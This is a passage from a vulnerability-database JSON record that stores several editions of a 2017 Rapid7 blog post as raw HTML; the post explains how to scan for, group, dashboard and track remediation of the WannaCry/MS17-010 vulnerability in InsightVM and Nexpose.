#000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:c0f66ace-52ba-4423-a175-b0606ee06294] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-17T13:59:04", "lastseen": "2017-05-17T14:49:14"}, "differentElements": ["description", "published", "modified"], "edition": 1}, {"lastseen": "2017-05-18T16:49:32", "bulletin": {"published": "2017-05-18T16:33:44", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 15, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:040bdfaf-c803-4908-9a24-8e9090b7e64f] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/17/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:040bdfaf-c803-4908-9a24-8e9090b7e64f] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-18T16:33:44", "lastseen": "2017-05-18T16:49:32"}, "differentElements": ["description"], "edition": 2}, {"lastseen": "2017-06-07T15:18:07", "bulletin": {"published": "2017-06-07T14:57:05", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 37, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:f234a140-3a4d-465a-bf33-b296a18e2137] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated 